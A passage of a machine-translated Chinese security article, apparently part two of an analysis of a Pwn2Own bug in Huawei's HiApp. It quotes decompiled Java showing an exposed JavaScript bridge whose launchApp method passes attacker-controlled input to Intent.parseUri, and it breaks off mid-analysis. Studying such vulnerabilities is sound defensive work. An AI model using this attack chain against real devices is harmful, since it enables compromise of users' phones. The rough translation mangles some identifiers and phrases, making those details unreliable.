Pwn2Own Huawei HiApp vulnerability principle and the use of analysis of under-vulnerability warning-the black bar safety net

ID MYHACK58:62201890401
Type myhack58
Reporter 佚名
Modified 2018-06-08T00:00:00


0×01 Preface Pwn2Own Huawei HiApp vulnerability principle and the use of the analysis(on) Reading this article is the basis for understanding previous attacks construct the link. 0×02 vulnerability analysis I don't know if the attentive classmates found in my article analysis article left in the egg. The present article is naturally from the eggs cut. this. mWebvewDelegate. initView(((Context)this), request);//I is eggs this. mWebvewDelegate. loadPage(url); // load the url From previous analysis we already know mWebvewDelegate instance of the class is: InternalWebviewDelegate,then cut InternalWebviewDelegate. initView function for analysis. public void initView(Context arg6, Request arg7) { this. mContext = arg6; WebSettings v0 = this. webview. getSettings(); ... this. webview. removeJavascriptInterface("accessibility"); this. webview. removeJavascriptInterface("accessibilityTraversal"); if(Build$VERSION. SDK_INT >= 17) { this. webview. removeJavascriptInterface("searchBoxJavaBridge_"); } ... this. webview. getSettings(). setJavaScriptEnabled(true);//allows the execution of js script this. webview. requestFocus(); this. webview. setWebViewClient(new InternalWebViewClient(this)); this. webview. setWebChromeClient(new MarketWebChromeClient(this)); this. webview. getSettings(). setBlockNetworkImage(true); this. webview. addJavascriptInterface(new HiSpaceObject(this. mContext, ((JsCallBackOjbect)this), this. webview), "HiSpaceObject"); // key point,exposure to an object ... } Audit this code can be found setJavaScriptEnabled(true)executable js script,on a piece of analysis we can already through DNS spoofing,so that the final load the url for us may be constructed of any page or script, that is can control the js input. About the addJavascriptInterface usage, you can read the reference articles. The key point is HiSpaceObject. the class class in the @JavascriptInterface annotation,this annotation method is that we can control the call method. Including the installation of the APP,uninstall the APP etc. function. According to the vulnerability of the author are described,their main purpose is to look for RCE,and HiApp, but also can not be triggered,hence the need to find other App's vulnerability to trigger, and therefore the focus here is on the analysis can not start the other App,and just further exposes such a method. @JavascriptInterface public void the-launchapp(String pkgName, String uri) { URISyntaxException excrpt; Intent intent; a. a("HiSpaceObject", "the-launchapp"); //log Intent newIntent = new Intent(); try { intent = Intent. parseUri(uri, 0);//key point } catch(URISyntaxException v0) { URISyntaxException v5 = v0; intent = newIntent; excrpt = v5; goto label_15; } try { intent. setPackage(pkgName); goto label_8; } catch(URISyntaxException excrpt) { } label_15: a. d("HiSpaceObject", "uri error!" + excrpt. toString()); //log label_8: this. mActivity. startActivity(intent);//finally start the activity,here we can control the Intent } Analyzing the code above us can be found,mainly is the need for two parameters,pkgName and Uri, and finally call startActivity to start the Activity. Here naturally there is a problem,if there is no way to pass some extra to the activity,that is not we can control the data stream, and therefore is useless. However, due to the call Intent. parseUri(uri, 0);,Then whether there is a breakthrough opportunity? By viewing the source code shows that the(详见参考 * Flag for use with {@link #toUri} and {@link #parseUri}: the URI string

[1] [2] next